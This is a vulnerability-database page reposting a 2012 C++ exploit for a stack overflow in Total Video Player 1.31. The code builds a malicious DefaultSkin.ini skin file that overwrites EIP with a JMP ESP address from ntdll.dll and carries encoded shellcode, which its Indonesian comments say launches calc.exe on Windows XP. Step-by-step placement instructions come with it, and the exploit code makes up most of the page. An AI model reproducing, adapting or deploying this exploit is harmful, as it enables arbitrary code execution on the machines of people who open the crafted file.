Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Total Video Player V1.31 stack overflow

🗓️ 12 Jun 2012 00:00:00Reported by AyrbyteType 
zdt
 zdt🔗 0day.today👁 19 Views

Total Video Player V1.31 stack overflow exploi

Code
/*##############################################################################################
title       : Total Video Player V1.31 stack overflow
author      : Ayrbyte
link        : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on   : Windows XP sp 2
fb          : fb.me/Ayrbyte
greetz to   : thank's to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky, 
              Zet Dot Exe and all b-compi family ^_^ 
              We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
>>compile this exploit to make file DefaultSkin.ini
>>put file DefaultSkin.ini to [TVP instalation folder]\Skins\DefaultSkin\DefaultSkin.ini    
>>run TVP and you will show calc.exe
##############################################################################################*/
#include <iostream>
using namespace std;

char _isi1[] =
"\x5B\x47\x65\x6E\x65\x72\x61\x6C\x5D\x20\x0D\x0A\x41\x75\x74\x68\x6F\x72\x3A\x20\x41\x79\x72\x62\x79\x74\x65\x0D\x0A\x43\x6F\x6E\x74\x61\x63\x74\x3A\x20\x62\x2D\x63\x6F\x6D\x70\x69\x2E\x6E\x65\x74\x0D\x0A\x0D\x0A\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0D\x0A\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C\x49\x44\x0D\x0A\x41\x62\x6F\x75\x74\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x56\x43\x74\x72\x6C\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x0D\x0A\x5B\x48\x6F\x6F\x6B\x46\x69\x6C\x74\x65\x72\x5D\x0D\x0A\x4E\x6F\x74\x48\x6F\x6F\x6B\x20\x3D\x20\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x2C\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x0D\x0A\x0D\x0A\x5B\x48\x6F\x6F\x6B\x53\x70\x65\x63\x69\x61\x6C\x5D\x0D\x0A\x53\x70\x65\x63\x69\x61\x6C\x20\x3D\x20\x41\x62\x6F\x75\x74\x57\x69\x6E\x64\x6F\x77\x0D\x0A\x0D\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0D\x0A\x4D\x61\x73\x6B\x3D\x4D\x61\x73\x6B\x2E\x62\x6D\x70\x0D\x0A\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x44\x6F\x77\x6E\x3D\x64\x6F\x77\x6E\x2E\x62\x6D\x70\x0D\x0A\x4F\x76\x65\x72\x3D\x6F\x76\x65\x72\x2E\x62\x6D\x70\x0D\x0A\x44\x69\x73\x61\x62\x6C\x65\x64\x3D\x64\x69\x73\x61\x62\x6C\x65\x2E\x62\x6D\x70\x0D\x0A\x52\x65\x53\x69\x7A\x65\x3D\x46\x41\x4C\x53\x45\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0D\x0A\x4D\x61\x69\x6E\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x44\x6F\x77\x6E\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x44\x6F\x77\x6E\x2E\x62\x6D\x70\x0D\x0A\x4F\x76\x65\x72\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4F\x76\x65\x72\x2E\x62\x6D\x70\x0D\x0A\x44\x69\x73\x61\x62\x6C\x65\x64\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x52\x65\x53\x69\x7A\x65\x3D\x54\x52\x55\x45\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x4D\x45\x4E\x55\x5D\x0D\x0A\x42\x6B\x50\x69\x63\x4E\x61\x6D\x65\x3D\x4D\x65\x6E\x75\x2E\x62\x6D\x70\x0D\x0A\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x3D\x4D\x53\x20\x53\x61\x6E\x73\x20\x53\x65\x72\x69\x66\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x2E\x62\x6D\x70\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x45\x6E\x64\x3D\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x45\x6E\x64\x2E\x62\x6D\x70\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x74\x61\x72\x74\x3D";
char _A[] = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6";
char _EIP[] = "\xED\x1E\x94\x7c";
char _B[]= 
"BBBBBBBBBBBBђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ";
char _playload[] = 
"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
char _akhir[] = "B"; //nilai sampah untuk melengkapi input agar tetap 1000
char _isi2[] = //isi penutup
"\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x2E\x62\x6D\x70";

int main(){
    FILE *_file;
    #define _namefile "DefaultSkin.ini"
    _file = fopen(_namefile, "w");
    fputs(_isi1, _file); //isi pembuka
    fputs(_A, _file); //input sebelum EIP
    fputs(_EIP, _file); // EIP beralamat 7C941EED  JMP ESP dari ntdll.dll
    fputs(_B, _file); //input untuk nop (No Operation) sebelum playload
    fputs(_playload, _file); //playload untuk menjalankan calc.exe
    //di sini nelai EIP tergantung oleh jumlah input
    //jumlah input yang kurang dari 1000 sisanya di tambah dengan
    //nilai sampah "B", agar EIP nya bernilai tetap
    for (int i=0; i < 1000 - (strlen(_A) + strlen(_EIP) + strlen(_B) + strlen(_playload));i++)
    {fputs(_akhir, _file);}
    fputs(_isi2, _file);
    fclose(_file);
    return 0;    
}




#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jun 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8
ayrbytesoftpediawindows xpstack overflowexploitcalc.exe
19